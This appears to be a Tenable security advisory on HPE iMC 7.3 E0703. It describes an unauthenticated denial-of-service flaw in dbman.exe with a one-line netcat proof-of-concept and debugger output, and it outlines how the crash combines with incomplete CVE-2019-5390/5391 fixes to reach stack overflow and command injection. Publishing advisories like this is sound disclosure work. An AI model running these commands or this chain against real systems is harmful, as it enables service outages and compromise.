Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

HPE iMC 7.3 E0703 Multiple Vulnerabilities

Critical

Synopsis

Unauthenticated Remote Denial of Service (DoS)

The flaw exists in the CDataConnStreamQueueT::deal_msg method in dbman.exe where the C++ new operator is used to allocate memory with the allocation size specified by the attacker:

.text:0045AD95      mov     eax, dword ptr [ebp+var_first4bytes]; attacker-controlled
.text:0045AD98      add     eax, 1
.text:0045AD9B      push    eax                        ; unsigned int
.text:0045AD9C      call    [email protected]@Z              ; operator new[](uint)

The attacker can specify a large allocation size (i.e., 0xfffffff0) by sending the following data to dbman:

echo -ne '\xff\xff\xff\x00' | nc  2810

Which could cause an exception thrown by the new operator:

0:005> g
(1b0c.1ab4): C++ EH exception - code e06d7363 (first chance)
(1b0c.1ab4): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=0257d7c8 ebx=00000021 ecx=00000003 edx=00000000 esi=7448c164 edi=00000218
eip=7629c1a2 esp=0257d7c8 ebp=0257d824 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
KERNELBASE!RaiseException+0x62:
7629c1a2 8b4c2454        mov     ecx,dword ptr [esp+54h] ss:002b:0257d81c=339b14f7
0:001> kb
 # ChildEBP RetAddr  Args to Child              
00 0257d824 7444df60 e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x62
01 0257d85c 74453efd 0257d86c 7447d604 743f2a10 MSVCR90!_CxxThrowException+0x48 [f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\throw.cpp @ 161] 
02 0257d878 0045ada1 ffffff01 45e63853 00000000 MSVCR90!operator new+0x64 [f:\dd\vctools\crt_bld\self_x86\crt\src\new.cpp @ 63] 
WARNING: Stack unwind information not available. Following frames may be wrong.
03 0257fd38 00461415 02320628 02320628 004c7144 dbman+0x5ada1
04 0257fd4c 70e7c3c9 00000218 00000054 00000000 dbman+0x61415

And the dbman process does not appear to handle the exception, resulting in process termination.

Incomplete Fixes for CVE-2019-5390 and CVE-2019-5391

The root cause of these vulnerabilities was not addressed in 7.3 E0703.

In exploitation scenarios, the attacker would first send a command 10018 (for dbman.conf variable injection) followed by a command 10000 (for dbman.conf reloading). This would be enough to trigger the stack overflow. However, with the command injection, an additional command 10002 would have to be sent to trigger a backup.

HPE iMC version 7.3 E0703 introduced changes to enforce commands 10000 and 10002 to be encrypted while allowing unencrypted command 10018. The attacker can still send a command 10018 to inject configuration variables into dbman.conf, but he/she can not send commands 10000 or 10002 without an encryption key.

However, the attacker can use the DoS vulnerability described above to kill the dbman process, forcing a restart. It's been observed that the restart happens automatically under imcsysdm.exe if the Intelligent Deployment Monitoring Agent has started (a likely production configuration). When dbman restarts with the modified dbman.conf containing a long BackHoseIp variable, stack buffer overflow occurs. Additionally, the BackupTime and BackupTimeMinute variable values can be set in the 10018 request to schedule an automated backup. This is enough to trigger the command injection.

WinDbg output:

STATUS_STACK_BUFFER_OVERRUN encountered
(990.123c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for dbman.exe - 
eax=00000000 ebx=00000001 ecx=76275108 edx=0000002b esi=00000000 edi=00000000
eip=7631d74a esp=0019a32c ebp=0019a3b4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
KERNELBASE!UnhandledExceptionFilter+0x5a:
7631d74a cc              int     3
0:000> kb 
 # ChildEBP RetAddr  Args to Child              
00 0019a3b4 004a9859 004cb258 721993ca 8de66c35 KERNELBASE!UnhandledExceptionFilter+0x5a
WARNING: Stack unwind information not available. Following frames may be wrong.
01 0019a6e8 0044dabb 0019a97c 0019a97c 0019a998 dbman!std::_Init_locks::operator=+0xcd1
02 0019b068 41414141 41414141 41414141 41414141 dbman+0x4dabb
03 0019b06c 41414141 41414141 41414141 41414141 0x41414141
04 0019b070 41414141 41414141 41414141 41414141 0x41414141
...

And the !exploitable WinDbg extension command shows it's exploitable:

0:000> .load msec.dll
0:000> !exploitable

!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at KERNELBASE!UnhandledExceptionFilter+0x000000000000005a (Hash=0xdaf335ab.0xf6a1be01)

Corruption of the exception handler chain is considered exploitable

Solution

A solution is not yet available.

Disclosure Timeline

06/05/2019 - Vulnerabilities discovered.
06/11/2019 - Vulnerabilities disclosed to HPE security. 90-day date is 09/09/2019.
06/14/2019 - HPE replies with an encrypted message. Tenable can't decrypt it, and sends HPE their public key.
06/18/2019 - Tenable's PGP key expired 6/17. Sends updated key to HPE.
06/21/2019 - HPE says the wrong key was used to encrypt the original disclosure. They will resend their key. Additionally, they can't import our key.
06/24/2019 - Tenable resends PGP public key and asks for HPE's key.
06/25/2019 - HPE sends a new key.
06/25/2019 - Tenable sends the original disclosure using the new key.
06/26/2019 - HPE says they sent us the wrong key. Sends another key and asks us to use that one moving forward.
06/26/2019 - Tenable acknowledges. Asks if we need to resend the report using the new key.
06/26/2019 - HPE asks to resend with new key.
06/26/2019 - Tenable resends with new key.
06/27/2019 - HPE assigns case number PSRT110957 and will let us know the action plan.
07/16/2019 - Tenable asks for an update.
07/30/2019 - Tenable asks for an update.
08/02/2019 - HPE does not have a target release date yet.
08/26/2019 - Tenable asks for an update.
09/03/2019 - As a professional courtesy, Tenable will extend the disclosure date by 2 weeks. The new disclosure date is 09/23/2019.
09/17/2019 - Tenable asks if HPE has received our communications. Reminds HPE that disclosure date is less than a week away.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now

Try Tenable.io

FREE FOR 30 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now.

Buy Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

$2,275

Buy Now

Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, email, community and chat support 24 hours a day, 365 days a year. Full details here.

Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 30 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 30 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Learn More about Industrial Security

Get a Demo of Tenable.sc

Please fill out the form below with your contact information and a sales representative will contact you shortly to schedule a demo. You may also include a short comment (limited to 255 characters). Please note that fields with asterisks (*) are mandatory.

Try for Free Contact Sales

Try Tenable Lumin

FREE FOR 30 DAYS

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Buy Tenable Lumin

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.